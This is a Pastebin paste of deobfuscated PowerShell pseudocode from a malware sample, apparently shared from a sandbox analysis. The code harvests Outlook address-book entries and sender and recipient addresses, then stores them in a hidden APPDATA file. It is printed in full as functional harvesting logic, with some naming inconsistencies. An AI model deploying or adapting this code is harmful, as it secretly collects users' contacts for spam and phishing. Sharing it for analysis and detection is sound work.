Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # deobfuscated pseudocode from l.ps1 - https://app.any.run/tasks/9433b851-34b9-462b-895e-26a8402b9985
- Add-Type -assembly Microsoft.Office.Interop.Outlook
- $NEW_OUTLOOK = New-Object -comobject Outlook.Application
- $MAPI = $NEW_OUTLOOK.GetNameSpace(MAPI)
- $COLLECTION = [System.Collections.ArrayList]@()
- function CHECK_VALID($STOLEN_ADDRESS)
- {
- $EMAIL_REGEX = "^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$"
- if ($STOLEN_ADDRESS -match $EMAIL_REGEX) {
- return $true
- }
- return $false
- }
- function COLLECT_INFO($STOLEN_ADDRESS) {
- if ($STOLEN_ADDRESS) {
- $KNOWN_ADDRESS = $false
- $STOLEN_ADDRESS = $STOLEN_ADDRESS.ToLower()
- if ($STOLEN_ADDRESS.StartsWith("'") -And $STOLEN_ADDRESS.EndsWith("'")) {
- $STOLEN_ADDRESS = $STOLEN_ADDRESS.Substring(1, $STOLEN_ADDRESS.Length - 2)
- }
- if (CHECK_VALID($STOLEN_ADDRESS)) {
- for($CT_ADDRESSES = 0;$CT_ADDRESSES -lt $OUTLOOK_EXPORT.Count;$CT_ADDRESSES++) {
- if ($OUTLOOK_EXPORT[$CT_ADDRESSES] -eq $STOLEN_ADDRESS) {
- $KNOWN_ADDRESS = $true
- break
- }
- }
- if (-Not $KNOWN_ADDRESS) {
- $FINAL_EXPORT = $OUTLOOK_EXPORT.Add($STOLEN_ADDRESS)
- }
- }
- }
- }
- function STEAL_ADDRESS_LISTS {
- $CT_ADDRESS_LIST = $MAPI.AddressLists
- for($CT_ADDRESS = 1;$CT_ADDRESS -le $CT_ADDRESS_LIST.Count;$CT_ADDRESS++) {
- $CT_ADDRESS_ENTRY = $CT_ADDRESS_LIST.Item($CT_ADDRESS).AddressEntries
- for($OL_ADDRESS = 1;$OL_ADDRESS -le $CT_ADDRESS_ENTRY.Count;$OL_ADDRESS++) {
- $CURR_ADDRESS = $CT_ADDRESS_ENTRY.Item($OL_ADDRESS)
- $CURR_ADDRESS_TYPE = $CURR_ADDRESS.AddressEntryUserType
- $STOLEN_ADDRESS = ""
- if ($CURR_ADDRESS_TYPE -eq 10) {
- $STOLEN_ADDRESS = $CURR_ADDRESS.Address
- } elseif (($CURR_ADDRESS_TYPE -eq 3) -Or ($CURR_ADDRESS_TYPE -eq 1) -Or ($CURR_ADDRESS_TYPE -eq 4) -Or ($CURR_ADDRESS_TYPE -eq 2) -Or ($CURR_ADDRESS_TYPE -eq 5) -Or ($CURR_ADDRESS_TYPE -eq 0)) {
- $STOLEN_ADDRESS = $CURR_ADDRESS.GetExchangeUser().PrimarySmtpAddress
- }
- COLLECT_INFO($STOLEN_ADDRESS)
- }
- }
- }
- function STEAL_EMAIL_ADDRESS($MAPI.Folders) {
- for($CT_FOLDERS = 1;$CT_FOLDERS -le $MAPI.Folders.Count;$CT_FOLDERS++) {
- $CURR_FOLDER = $MAPI.Folders.Item($CT_FOLDERS)
- $CURR_ITEMS = $CURR_FOLDER.Items
- for($OL_ITEM = 1;$OL_ITEM -le $CURR_ITEMS.Count;$OL_ITEM++) {
- $INDIV_EMAIL = $CURR_ITEMS.Item($OL_ITEM)
- $RECIPIENTS = $INDIV_EMAIL.Recipients
- for($CURR_RECIPIENT = 1;$CURR_RECIPIENT -le $RECIPIENTS.Count;$CURR_RECIPIENT++) {
- $CURR_RECIPIENT_DETAILS = $RECIPIENTS.Item($CURR_RECIPIENT)
- $CURR_ADDRESS = $CURR_RECIPIENT_DETAILS.AddressEntry
- $CURR_ADDRESS_TYPE = $CURR_ADDRESS.AddressEntryUserType
- $STOLEN_ADDRESS = "";
- if ($CURR_ADDRESS_TYPE -eq 0) {
- $STOLEN_ADDRESS = $CURR_ADDRESS.GetExchangeUser().PrimarySmtpAddress
- } elseif (($CURR_ADDRESS_TYPE -eq 30) -Or ($CURR_ADDRESS_TYPE -eq 10)) {
- $STOLEN_ADDRESS = $CURR_ADDRESS.Address
- }
- COLLECT_INFO($STOLEN_ADDRESS)
- }
- $CURR_ADDRESS = $INDIV_EMAIL.Sender
- $CURR_ADDRESS_TYPE = $CURR_ADDRESS.AddressEntryUserType
- $STOLEN_ADDRESS = "";
- if ($CURR_ADDRESS_TYPE -eq 0) {
- $STOLEN_ADDRESS = $CURR_ADDRESS.GetExchangeUser().PrimarySmtpAddress
- } elseif (($CURR_ADDRESS_TYPE -eq 30) -Or ($CURR_ADDRESS_TYPE -eq 10)) {
- $STOLEN_ADDRESS = $CURR_ADDRESS.Address
- }
- COLLECT_INFO($STOLEN_ADDRESS)
- }
- STEAL_EMAIL_ADDRESS($CURR_FOLDER.Folders)
- }
- }
- function GET_LIST_AND_EMAIL() {
- STEAL_ADDRESS_LISTS
- STEAL_EMAIL_ADDRESS($MAPI.Folders)
- Add-Content $env:APPDATA\Microsoft\.Outlook $OUTLOOK_EXPORT
- }
- function STEAL_EMAIL_INFO() {
- $FILE_EXISTS = [System.IO.File]::Exists($CHECK_FILE)
- if (-Not $FILE_EXISTS) {
- "" | sc $CHECK_FILE
- GET_LIST_AND_EMAIL
- }
- }
- STEAL_EMAIL_INFO
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement